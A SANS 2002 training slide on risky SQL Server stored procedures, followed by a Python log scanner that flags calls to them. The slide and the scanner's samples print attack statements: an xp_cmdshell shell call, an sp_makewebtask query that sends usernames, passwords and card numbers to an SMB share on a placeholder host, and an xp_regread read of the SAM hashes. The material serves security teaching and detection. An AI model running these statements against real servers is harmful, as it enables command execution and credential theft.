SANS 2002 77
MSSQL – Vulnerabilities
• Dangerous Stored Procedures
– The infamous xp_cmdshell
EXEC master..xp_cmdshell "cmd.exe /c …"
– Sending query results back to you via SMB
EXEC master..sp_makewebtask "\\ip\tmp\test.html",
"SELECT username, password,cc from users"
– Dump the SAM password hashes via xp_regread
EXEC xp_regread HKLM,
'SECURITY\SAM\Domains\Account ','F'
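
Added example, not part of the original slide: a Python check a defender could run over SQL Server audit or application query logs to flag calls to the three procedures listed above. The function names, finding text and sample statements are assumptions made for this illustration.

```python
import re

# Procedures named on the slide and why each one matters to a defender.
RISKY_PROCS = {
    "xp_cmdshell": "runs an operating-system command",
    "sp_makewebtask": "writes query results to a file",
    "xp_regread": "reads the registry",
}
# Procedure name, optionally [bracketed], not embedded in a longer identifier.
CALL = re.compile(r"(?<![\w@#$])\[?(" + "|".join(RISKY_PROCS) + r")\]?(?![\w$#])", re.I)
# String literals are matched first so a '--' inside a literal is not taken for a comment.
TOKEN = re.compile(r"'(?:[^']|'')*'|\"(?:[^\"]|\"\")*\"|/\*.*?\*/|--[^\n]*", re.S)
UNC = re.compile(r"\\\\[\w.-]+\\")        # \\host\ style destination
SAM = re.compile(r"SECURITY\\SAM", re.I)  # key path shown on the slide


def strip_comments(sql):
    """Blank out T-SQL comments while leaving quoted strings untouched."""
    return TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] in "'\"" else " ", sql)


def scan_statement(sql):
    """Return sorted (procedure, finding) pairs for one logged T-SQL statement."""
    text = strip_comments(sql)
    findings = set()
    # Names inside string literals are flagged on purpose: dynamic SQL hides calls there.
    for m in CALL.finditer(text):
        proc = m.group(1).lower()
        detail = RISKY_PROCS[proc]
        if proc == "sp_makewebtask" and UNC.search(text):
            detail += "; UNC destination sends the data off-host over SMB"
        if proc == "xp_regread" and SAM.search(text):
            detail += "; targets the SAM key"
        findings.add((proc, detail))
    return sorted(findings)


# Constructed log statements; the first three repeat the calls shown on the slide.
SAMPLES = [
    r"EXEC master..xp_cmdshell 'cmd.exe /c ...'",
    r'EXEC master..sp_makewebtask "\\ip\tmp\test.html", "SELECT username, password,cc from users"',
    r"EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account ','F'",
    "SELECT name FROM sysobjects -- xp_cmdshell was removed on this host",
    "SELECT '--'; EXEC /* audit */ [master]..[xp_cmdshell] 'cmd.exe /c ...'",
    "SELECT xp_cmdshell_enabled FROM inventory",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan_statement(s) or "clean", "<-", s)
```

A hit on any of these procedures from an application login is worth an alert, since ordinary application queries rarely need them.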